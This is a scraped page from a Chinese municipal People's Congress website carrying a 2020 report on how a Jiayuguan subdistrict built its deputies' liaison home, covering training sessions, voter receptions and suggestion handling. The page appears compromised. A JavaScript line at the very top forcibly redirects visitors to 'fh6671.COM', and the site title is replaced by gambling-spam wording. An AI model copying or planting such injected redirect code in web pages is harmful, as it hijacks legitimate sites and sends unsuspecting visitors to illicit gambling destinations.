function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新代表履职  >>  代表风采  
规范建设搭平台   促进履职增活力
不断增强基层“人大代表之家”履责水平
来源:       日期: 2020-06-23      作者: 郑海燕      点击数:

——市钢城街道人大代表之家经验材料

钢城街道人大代表之家召集人      郑海燕

位领导、同志们:

2019年机构改革后,街道人大工委认真贯彻市人大关于加强基层人大工作的一系列要求,“人大代表之家(站)”规范化建设,作为强化代表履职的重要载体,和加强基层人大工作的有力抓手,大力推进、加强指导、注重实效,使“人大代表之家(站)”成为代表联系群众的主平台和主阵地,积极为人大代表之家依法行使职权、全面履行职能创造有利条件,较好地发挥了视察调研、联系群众、舆论宣传和学习交流等方面的作用。根据会议安排,我就工作情况作一交流汇报,不妥之处,敬请批评指正。

一、提高政治站位,落实“三个到位”,为家(站)建设提供组织保证。

一是组织领导到位。街道党工委加强对“人大代表之家”建设的统筹、指导、协调,把人大工作和建设纳入工作总体布局,与党建工作同研究、同部署,制定工作计划,明确重点工作。二是协调指导到位。认真贯彻落实市人大工作安排部署,保证“家”和站高标准建设,健全完善街道、社区组织工作机构,确定代表之家召集人,明确社区党委书记的代表工作站站长职责,“家”和工作任务、活动形式进行具体规范三是氛围营造到位。注重示范带动、培树典型,推动标准化建设以点带面,利用报刊、自媒体等平台发表宣传70余篇,及时反映“家”、站活动工作动态,持续强化“人大代表之家(站)”工作成果宣传,增强了人大代表的集体荣誉感和归属感。

二、建强服务阵地,落实“三化标准”, 全面提升“人大代表之家”建设水平。

一是建设标准化。街道1个“ 家”、14个站硬件全部实现“8”标准,统一建立“代表名录墙”,实行代表信息、代表权利义务、制度职责全部公开公示,让代表活动有阵地。二是工作运行制度化。健全完善了代表学习、建议办理、接待选民、联系选民、述职评议、履职考核等工作制度。严格落实制度组织开展学习、调研、接待等活动。三是活动开展常态化。围绕代表联系选民、组织活动开展、民生实事办理等方面的工作,每季度开展一次代表集体学习,每半年组织一次集体调研,定期开展选民接待。

三、注重作用发挥,打造“特色三站”, 激发“人大代表之家(站)”运行活力。

一是强化学习培训,把代表之家打造成为“充电站”。 突出政治理论学习和业务知识,以近年先后组织代表开展习近平新时代中国特色社会主义思想和党的十九大、二中、三中、四中全会精神,《宪法》等各类学习培训累计58次,提高了代表履职能力和法律素养。提升代表履职,服务能力,打造“服务站”。二是丰富学习形式,把代表之家打造成为“加油站”。通过收看视频直播课、实地观摩交流学,建立“人大代表联络群”等方式,灵活开展学习交流,拓宽学习平台和途径。先后组织27名代表到兄弟单位、省内先进单位开展家站建设考察、党性教育学习,开阔代表视野,拓展工作思路。三是定期接待选民,把代表之家打造成为反映社情民意的“解压站”。充分发挥人大代表的联系、协调作用,累计共接待选民120次近千人,征集意见建议72条,办结57条,办结率90%以上,配合办理的建议累计23件,办结率100%,代表满意率100%,使代表真正当好群众的“代言人”。

四、强化服务管理,坚持“三抓举措”,提升“人大代表之家(站)”工作水平。

一是坚持问题导向,抓活动开展。围绕中心,服务大局,紧盯市委、市政府关注的热点问题和人民群众关心的难点问题开展调研视察。组织代表对居民多次反映的润泽园小区出入口设置、狗患治理、无物业小区下水管网改造,取暖、再生资源回收站管理等突出问题开展专题调研4次。是坚持服务导向,抓实事落实。开展“人大代表抗疫在行动”“人大代表回选区”“ 走基层”活动,发动人大代表积极参与街道社区疫情防控工作,文明城市、卫生城市的双城同创、社区双报到、双服务等活动,集中开展专项督查活动6次。通过密切代表同选民的联系,听取和反映选民的意见建议,助推惠民实事解决落地。三是坚持效果导向,抓履职监督。注重人大代表建议办理工作,加强协调,高质量完成建议办复。切实抓牢代表工作的考核评价,针对代表履职,调研,建议等工作组织20名代表向选民述职,并由选民进行评议,增强履职成效。通过选民监督代表履职的方式推动各级人大代表认真履职尽责。

各位领导,同志们,街道“人大代表之家”建设工作虽然取得了一些成绩,但是离市人大的工作要求和代表们的期望还有一定差距。下一步,我们将进一步提高政治站位,把思想和行动统一到市委和人大工作的决策部署上来,深刻领会和把握基层人大工作面临的新形势、新任务、新要求,强化“作为”意识、提高“能为”本领、找准“善为”路径,紧抓“活动正常、措施具体、成效明显”的目标开展“人大代表之家(站)”活动,以解决实际问题来衡量和检验人大工作成效,力求“新作为”,展现“新面貌”,推动街道人大工作与时俱进、创新发展。